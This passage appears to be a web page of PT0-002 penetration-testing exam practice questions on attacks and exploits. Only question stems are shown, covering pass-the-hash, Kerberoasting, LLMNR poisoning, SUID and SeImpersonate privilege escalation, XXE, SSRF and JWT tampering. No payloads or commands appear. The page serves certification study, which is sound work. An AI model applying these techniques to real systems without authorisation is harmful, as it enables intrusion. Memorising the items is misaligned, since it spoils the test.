Read the full Attacks and Exploits explanation →

During a web application penetration test, you find that the application is vulnerable to CSRF. Which TWO factors could prevent exploitation even if a CSRF vulnerability exists? (Select TWO.)

Question 150hardmulti select
Read the full Attacks and Exploits explanation →

You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)

Question 151easymultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR responses. Which tool is most commonly used for this purpose?

Question 152mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to perform a pass-the-hash attack against a Windows target. Which tools can be used to authenticate using an NTLM hash without knowing the plaintext password? (Choose the best option.)

Question 153hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, a tester discovers a parameter that appears to be vulnerable to SQL injection. They want to extract data from a database using a technique that does not rely on visible output. Which type of SQL injection is most appropriate?

Question 154easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester identifies a Linux binary with the SUID bit set. Which command can find all SUID binaries on a Linux system?

Question 155mediummultiple choice
Read the full Attacks and Exploits explanation →

While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?

Question 156mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?

Question 157easymultiple choice
Read the full Attacks and Exploits explanation →

After gaining initial access to a target, a tester wants to pivot to an internal network that is not directly accessible. Which technique can be used to forward traffic from the tester's machine through the compromised host to reach internal services?

Question 158mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester needs to perform Kerberoasting against an Active Directory domain. Which step is required after requesting TGS tickets?

Question 159hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?

Question 160mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester exploits an XXE vulnerability to read local files. Which of the following is a typical XXE payload to read /etc/passwd?

Question 161mediummultiple choice
Read the full Attacks and Exploits explanation →

After compromising a host, a tester wants to maintain persistence on a Windows system by executing a payload each time a user logs in. Which registry key is commonly used for this?

Question 162hardmultiple choice
Read the full Attacks and Exploits explanation →

A tester is using Hashcat to crack NTLM hashes. They want to try all possible passwords consisting of exactly 8 lowercase letters. Which attack mode and mask should they use?

Question 163mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)

Question 164mediummulti select
Read the full Attacks and Exploits explanation →

During a Linux privilege escalation attempt, a tester checks for misconfigurations that could allow running commands as root. Which of the following are potential vectors? (Select THREE.)

Question 165hardmulti select
Read the full Attacks and Exploits explanation →

A penetration tester has gained a foothold in a Windows domain and wants to perform lateral movement. Which of the following tools or techniques can be used? (Select THREE.)

Question 166easymultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester uses Responder to capture NTLM hashes from a Windows network. Which of the following protocols is MOST commonly targeted by Responder for poisoning?

Question 167mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?

Question 168hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, a tester discovers a JWT token with the following header: {'alg':'HS256','typ':'JWT'}. The token payload contains 'admin':false. The tester attempts to change the algorithm to 'none' and removes the signature. Which vulnerability is being exploited?

Question 169mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester uses Hashcat to crack NTLM hashes captured during a pass-the-hash attack. Which Hashcat mode should the tester use for NTLM hashes?

Question 170mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester has compromised a Windows machine and wants to perform lateral movement to another machine on the same network. The tester has obtained NTLM hashes, but not plaintext passwords. Which TWO tools can be used for pass-the-hash attacks?

Question 171hardmulti select
Read the full Attacks and Exploits explanation →

During a Linux privilege escalation assessment, the tester finds that a binary with SUID root can execute arbitrary commands. Which TWO of the following methods are MOST likely to exploit this?

Question 172mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?

Question 173easymulti select
Read the full Attacks and Exploits explanation →

A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?

Question 174mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is performing post-exploitation on a compromised Linux server and wants to maintain persistence. Which TWO of the following methods are commonly used for Linux persistence?

Question 175hardmulti select
Read the full Attacks and Exploits explanation →

During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?

Question 176easymulti select
Read the full Attacks and Exploits explanation →

A penetration tester is using Hashcat to crack password hashes. Which TWO attack modes are commonly used?

Question 177mediummulti select
Read the full Attacks and Exploits explanation →

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

Question 178mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is performing a web application test and identifies a potential SQL injection vulnerability. Which TWO methods can the tester use to confirm the vulnerability and extract data?

Question 179hardmulti select
Read the full Attacks and Exploits explanation →

During a penetration test, the tester gains access to a domain-joined Windows machine and wants to perform Kerberoasting. Which THREE conditions are necessary for a successful Kerberoasting attack?

Question 180mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is using Metasploit to pivot from a compromised host to an internal network. Which THREE Metasploit features can facilitate pivoting?

Question 181mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?

Practice tests

Scored 10-question sessions with instant feedback and explanations.

PT0-002 Practice Test 1 — 25 Questions→PT0-002 Practice Test 2 — 25 Questions→PT0-002 Practice Test 3 — 25 Questions→PT0-002 Practice Test 4 — 25 Questions→PT0-002 Practice Test 5 — 25 Questions→PT0-002 Practice Exam 1 — 20 Questions→PT0-002 Practice Exam 2 — 20 Questions→PT0-002 Practice Exam 3 — 20 Questions→PT0-002 Practice Exam 4 — 20 Questions→Free PT0-002 Practice Test 1 — 30 Questions→Free PT0-002 Practice Test 2 — 30 Questions→Free PT0-002 Practice Test 3 — 30 Questions→PT0-002 Practice Questions 1 — 50 Questions→PT0-002 Practice Questions 2 — 50 Questions→PT0-002 Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Information Gathering and Vulnerability ScanningPlanning and ScopingReporting and CommunicationAttacks and ExploitsTools and Code Analysis

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Attacks and Exploits setsAll Attacks and Exploits questionsPT0-002 Practice Hub